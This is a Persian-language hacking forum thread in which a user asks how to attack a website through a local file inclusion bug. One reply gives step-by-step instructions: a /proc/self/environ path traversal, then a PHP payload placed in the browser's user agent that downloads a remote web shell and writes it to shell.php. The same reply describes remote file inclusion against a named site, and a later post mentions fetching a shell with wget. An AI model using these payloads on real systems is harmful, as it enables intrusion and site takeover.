RE: سوال

سلام.
قوانین تیم رو رعایت کنید.هر تاپیکی سر جای خودش و همچنین درخواست نفوذ و ....هم نداریم.
خودتون شروع کنید و هک کنید.
مسابقه نیست که فیلم آموزشی هم بخواد.

RE: سوال

همه جا هستی ....

کی ذرخواست هک کردش گفتم بگین چه جوری میشه سایت رو با باگ lfi زد

RE: سوال


با سلام دوست عزیز

ابتدا قسمت proc/self/environ../../../../../../../../..

را به آخر سایت اضافه کرده و دستوری مبنی بر در یافت دایرکتوری دریافت میکنید(اگر ارور در یافت کردید باید راه دیگری وارد عمل شوید)

سپس به قسمت tools رفته و گزینه default user agent را انتخاب کنید (اگر این گزینه را ندارید آن را از گزینه

tools/web develper/GetMoreTools دریافت کنید و سپس به قسمتedit user agant رفته و new را انتخاب کنید و کد زیر را در آن

past کرده ونام آن را شل بگذارید

[php]<?php $shell=@file_get_contents("محل آپلود شل خود را بنویسید"); $fw=@fopen("shell.php","w"); fputs ($fw, $shell); fclose($fw); ?>[/php]

و سپس از قسمت default user agent گزینه shell را انتخاب کرده و پیج موجود را رفرش کنید ولرد شل خود خواهید شد!!
[hr]
ودر ضمن یادم رفت بگم که هر ساتی که دارای کدهای زیر نباشه ویا این که برروی کدهای زیر کنترلی نباشه یعنی مقدار دریافت ورودی

کنترل نشده یاشه میشه اونو هکش کرد ولی در این سایت مقادیر کنترل میشوند

اگر این مقادیر کنترل شده نبودند میتونستید با وارد کردن دستور

www.zeagle.com/index.php?page=http://www.google.com

بجای گوگل آدرس شلرتون .... به راحتی شل خودتونو آ| کنید اما در این سایت نمیتونید

مقادیری که در سورس اصلی نباید وجود داشته باشند

[php]1_$ include
2_$_require
3_$ include_once
4_$require_once[/php]

RE: سوال

اول جستجو کنید :

[align=CENTER]
local file include Upload Shell
[/align]

RE: سوال

دوستان پرم ندارم environ رو باز کنم
راستی یه راه دیگه هم هست اینه که رشلافه environ رو باز میکنیم tamper رو باز میکنیم بعد wget میزنیم به شل خودمنون
حالا الان پرم ندارم چیکار کنم؟